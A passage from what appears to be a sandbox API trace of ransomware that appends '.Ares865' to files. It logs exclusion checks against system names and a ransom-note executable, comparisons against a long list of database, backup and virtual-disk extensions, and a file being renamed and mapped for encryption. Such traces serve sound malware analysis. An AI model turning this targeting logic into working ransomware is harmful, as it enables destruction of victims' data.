(lpString="mdt") returned 3 [0084.984] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.985] lstrlenW (lpString="mfd") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.985] lstrlenW (lpString="mpd") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.985] lstrlenW (lpString="mrg") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.985] lstrlenW (lpString="mud") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.985] lstrlenW (lpString="mwb") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.985] lstrlenW (lpString="myd") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.985] lstrlenW (lpString="ndf") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.985] lstrlenW (lpString="nnt") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.985] lstrlenW (lpString="nrmlib") returned 6 [0084.985] lstrcmpiW (lpString1="26.bmp", lpString2="nrmlib") returned -1 [0084.985] lstrlenW (lpString="ns2") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.985] lstrlenW (lpString="ns3") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.985] lstrlenW (lpString="ns4") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.985] lstrlenW (lpString="nsf") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.985] lstrlenW (lpString="nv") returned 2 [0084.985] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.985] lstrlenW (lpString="nv2") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.985] lstrlenW (lpString="nwdb") returned 4 [0084.985] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.985] lstrlenW (lpString="nyf") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.985] lstrlenW (lpString="odb") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.985] lstrlenW (lpString="odb") returned 3 [0084.985] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.986] lstrlenW (lpString="oqy") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.986] lstrlenW (lpString="ora") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.986] lstrlenW (lpString="orx") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.986] lstrlenW (lpString="owc") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.986] lstrlenW (lpString="p96") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.986] lstrlenW (lpString="p97") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.986] lstrlenW (lpString="pan") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.986] lstrlenW (lpString="pdb") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.986] lstrlenW (lpString="pdm") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.986] lstrlenW (lpString="pnz") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.986] lstrlenW (lpString="qry") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.986] lstrlenW (lpString="qvd") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.986] lstrlenW (lpString="rbf") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.986] lstrlenW (lpString="rctd") returned 4 [0084.986] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.986] lstrlenW (lpString="rod") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.986] lstrlenW (lpString="rodx") returned 4 [0084.986] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.986] lstrlenW (lpString="rpd") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.986] lstrlenW (lpString="rsd") returned 3 [0084.986] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.986] lstrlenW (lpString="sas7bdat") returned 8 [0084.987] lstrcmpiW (lpString1="le26.bmp", lpString2="sas7bdat") returned -1 [0084.987] lstrlenW (lpString="sbf") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.987] lstrlenW (lpString="scx") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.987] lstrlenW (lpString="sdb") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.987] lstrlenW (lpString="sdc") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.987] lstrlenW (lpString="sdf") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.987] lstrlenW (lpString="sis") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.987] lstrlenW (lpString="spq") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.987] lstrlenW (lpString="te") returned 2 [0084.987] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.987] lstrlenW (lpString="teacher") returned 7 [0084.987] lstrcmpiW (lpString1="e26.bmp", lpString2="teacher") returned -1 [0084.987] lstrlenW (lpString="tmd") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.987] lstrlenW (lpString="tps") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.987] lstrlenW (lpString="trc") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.987] lstrlenW (lpString="trc") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.987] lstrlenW (lpString="trm") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.987] lstrlenW (lpString="udb") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.987] lstrlenW (lpString="udl") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.987] lstrlenW (lpString="usr") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.987] lstrlenW (lpString="v12") returned 3 [0084.987] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.987] lstrlenW (lpString="vis") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.988] lstrlenW (lpString="vpd") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.988] lstrlenW (lpString="vvv") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.988] lstrlenW (lpString="wdb") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.988] lstrlenW (lpString="wmdb") returned 4 [0084.988] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.988] lstrlenW (lpString="wrk") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.988] lstrlenW (lpString="xdb") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.988] lstrlenW (lpString="xld") returned 3 [0084.988] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.988] lstrlenW (lpString="xmlff") returned 5 [0084.988] lstrcmpiW (lpString1="6.bmp", lpString2="xmlff") returned -1 [0084.988] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.Ares865") returned 90 [0084.988] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.ares865"), dwFlags=0x1) returned 1 [0084.990] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.990] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.991] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.991] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.992] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.992] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.992] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.993] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0085.005] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0085.009] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0085.009] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0085.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0085.009] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0085.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0085.009] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0085.009] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0085.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0085.010] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0085.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0085.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0085.010] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0085.010] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0085.012] CloseHandle (hObject=0x15c) returned 1 [0085.012] CloseHandle (hObject=0x118) returned 1 [0085.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0085.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0085.012] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0085.013] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4184d0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4184d0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdd2a53c1, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile27.bmp", cAlternateFileName="")) returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="aoldtz.exe") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="..") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="windows") returned -1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="bootmgr") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="temp") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="pagefile.sys") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="boot") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="ids.txt") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="ntuser.dat") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="perflogs") returned 1 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2="MSBuild") returned 1 [0085.013] lstrlenW (lpString="usertile27.bmp") returned 14 [0085.013] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 82 [0085.013] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile27.bmp" | out: lpString1="usertile27.bmp") returned="usertile27.bmp" [0085.013] lstrlenW (lpString="usertile27.bmp") returned 14 [0085.013] lstrlenW (lpString="Ares865") returned 7 [0085.013] lstrcmpiW (lpString1="e27.bmp", lpString2="Ares865") returned 1 [0085.013] lstrlenW (lpString=".dll") returned 4 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".dll") returned 1 [0085.013] lstrlenW (lpString=".lnk") returned 4 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".lnk") returned 1 [0085.013] lstrlenW (lpString=".ini") returned 4 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".ini") returned 1 [0085.013] lstrlenW (lpString=".sys") returned 4 [0085.013] lstrcmpiW (lpString1="usertile27.bmp", lpString2=".sys") returned 1 [0085.013] lstrlenW (lpString="usertile27.bmp") returned 14 [0085.013] lstrlenW (lpString="bak") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0085.014] lstrlenW (lpString="ba_") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0085.014] lstrlenW (lpString="dbb") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0085.014] lstrlenW (lpString="vmdk") returned 4 [0085.014] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0085.014] lstrlenW (lpString="rar") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0085.014] lstrlenW (lpString="zip") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0085.014] lstrlenW (lpString="tgz") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0085.014] lstrlenW (lpString="vbox") returned 4 [0085.014] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0085.014] lstrlenW (lpString="vdi") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0085.014] lstrlenW (lpString="vhd") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0085.014] lstrlenW (lpString="vhdx") returned 4 [0085.014] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0085.014] lstrlenW (lpString="avhd") returned 4 [0085.014] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0085.014] lstrlenW (lpString="db") returned 2 [0085.014] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0085.014] lstrlenW (lpString="db2") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0085.014] lstrlenW (lpString="db3") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0085.014] lstrlenW (lpString="dbf") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0085.014] lstrlenW (lpString="mdf") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0085.014] lstrlenW (lpString="mdb") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0085.014] lstrlenW (lpString="sql") returned 3 [0085.014] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0085.015] lstrlenW (lpString="sqlite") returned 6 [0085.015] lstrcmpiW (lpString1="27.bmp", lpString2="sqlite") returned -1 [0085.015] lstrlenW (lpString="sqlite3") returned 7 [0085.015] lstrcmpiW (lpString1="e27.bmp", lpString2="sqlite3") returned -1 [0085.015] lstrlenW (lpString="sqlitedb") returned 8 [0085.015] lstrcmpiW (lpString1="le27.bmp", lpString2="sqlitedb") returned -1 [0085.015] lstrlenW (lpString="xml") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0085.015] lstrlenW (lpString="$er") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0085.015] lstrlenW (lpString="4dd") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0085.015] lstrlenW (lpString="4dl") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0085.015] lstrlenW (lpString="^^^") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0085.015] lstrlenW (lpString="abs") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0085.015] lstrlenW (lpString="abx") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0085.015] lstrlenW (lpString="accdb") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accdb") returned -1 [0085.015] lstrlenW (lpString="accdc") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accdc") returned -1 [0085.015] lstrlenW (lpString="accde") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accde") returned -1 [0085.015] lstrlenW (lpString="accdr") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accdr") returned -1 [0085.015] lstrlenW (lpString="accdt") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accdt") returned -1 [0085.015] lstrlenW (lpString="accdw") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accdw") returned -1 [0085.015] lstrlenW (lpString="accft") returned 5 [0085.015] lstrcmpiW (lpString1="7.bmp", lpString2="accft") returned -1 [0085.015] lstrlenW (lpString="adb") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.015] lstrlenW (lpString="adb") returned 3 [0085.015] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0085.016] lstrlenW (lpString="ade") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0085.016] lstrlenW (lpString="adf") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0085.016] lstrlenW (lpString="adn") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0085.016] lstrlenW (lpString="adp") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0085.016] lstrlenW (lpString="alf") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0085.016] lstrlenW (lpString="ask") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0085.016] lstrlenW (lpString="btr") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0085.016] lstrlenW (lpString="cat") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0085.016] lstrlenW (lpString="cdb") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0085.016] lstrlenW (lpString="ckp") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0085.016] lstrlenW (lpString="cma") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0085.016] lstrlenW (lpString="cpd") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0085.016] lstrlenW (lpString="dacpac") returned 6 [0085.016] lstrcmpiW (lpString1="27.bmp", lpString2="dacpac") returned -1 [0085.016] lstrlenW (lpString="dad") returned 3 [0085.016] lstrcmpiW (lpString1="bmp", lpString2="dad") returned -1 [0085.016] lstrlenW (lpString="dadiagrams") returned 10 [0085.016] lstrcmpiW (lpString1="tile27.bmp", lpString2="dadiagrams") returned 1 [0085.016] lstrlenW (lpString="daschema") returned 8 [0085.016] lstrcmpiW (lpString1="le27.bmp", lpString2="daschema") returned 1 [0085.016] lstrlenW (lpString="db-journal") returned 10 [0085.016] lstrcmpiW (lpString1="tile27.bmp", lpString2="db-journal") returned 1 [0085.016] lstrlenW (lpString="db-shm") returned 6 [0085.016] lstrcmpiW (lpString1="27.bmp", lpString2="db-shm") returned -1 [0085.016] lstrlenW (lpString="db-wal") returned 6 [0085.016] lstrcmpiW (lpString1="27.bmp", lpString2="db-wal") returned -1 [0085.017] lstrlenW (lpString="dbc") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dbc") returned -1 [0085.017] lstrlenW (lpString="dbs") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dbs") returned -1 [0085.017] lstrlenW (lpString="dbt") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dbt") returned -1 [0085.017] lstrlenW (lpString="dbv") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dbv") returned -1 [0085.017] lstrlenW (lpString="dbx") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0085.017] lstrlenW (lpString="dcb") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0085.017] lstrlenW (lpString="dct") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0085.017] lstrlenW (lpString="dcx") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0085.017] lstrlenW (lpString="ddl") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0085.017] lstrlenW (lpString="dlis") returned 4 [0085.017] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0085.017] lstrlenW (lpString="dp1") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0085.017] lstrlenW (lpString="dqy") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0085.017] lstrlenW (lpString="dsk") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0085.017] lstrlenW (lpString="dsn") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0085.017] lstrlenW (lpString="dtsx") returned 4 [0085.017] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0085.017] lstrlenW (lpString="dxl") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0085.017] lstrlenW (lpString="eco") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0085.017] lstrlenW (lpString="ecx") returned 3 [0085.017] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0085.017] lstrlenW (lpString="edb") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0085.018] lstrlenW (lpString="epim") returned 4 [0085.018] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0085.018] lstrlenW (lpString="fcd") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0085.018] lstrlenW (lpString="fdb") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0085.018] lstrlenW (lpString="fic") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0085.018] lstrlenW (lpString="flexolibrary") returned 12 [0085.018] lstrcmpiW (lpString1="ertile27.bmp", lpString2="flexolibrary") returned -1 [0085.018] lstrlenW (lpString="fm5") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0085.018] lstrlenW (lpString="fmp") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0085.018] lstrlenW (lpString="fmp12") returned 5 [0085.018] lstrcmpiW (lpString1="7.bmp", lpString2="fmp12") returned -1 [0085.018] lstrlenW (lpString="fmpsl") returned 5 [0085.018] lstrcmpiW (lpString1="7.bmp", lpString2="fmpsl") returned -1 [0085.018] lstrlenW (lpString="fol") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0085.018] lstrlenW (lpString="fp3") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0085.018] lstrlenW (lpString="fp4") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0085.018] lstrlenW (lpString="fp5") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0085.018] lstrlenW (lpString="fp7") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0085.018] lstrlenW (lpString="fpt") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0085.018] lstrlenW (lpString="frm") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0085.018] lstrlenW (lpString="gdb") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.018] lstrlenW (lpString="gdb") returned 3 [0085.018] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0085.018] lstrlenW (lpString="grdb") returned 4 [0085.019] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0085.019] lstrlenW (lpString="gwi") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0085.019] lstrlenW (lpString="hdb") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0085.019] lstrlenW (lpString="his") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0085.019] lstrlenW (lpString="ib") returned 2 [0085.019] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0085.019] lstrlenW (lpString="idb") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0085.019] lstrlenW (lpString="ihx") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0085.019] lstrlenW (lpString="itdb") returned 4 [0085.019] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0085.019] lstrlenW (lpString="itw") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0085.019] lstrlenW (lpString="jet") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0085.019] lstrlenW (lpString="jtx") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0085.019] lstrlenW (lpString="kdb") returned 3 [0085.019] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0085.019] lstrlenW (lpString="kexi") returned 4 [0085.019] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0085.019] lstrlenW (lpString="kexic") returned 5 [0085.019] lstrcmpiW (lpString1="7.bmp", lpString2="kexic") returned -1 [0085.019] lstrlenW (lpString="kexis") returned 5 [0085.019] 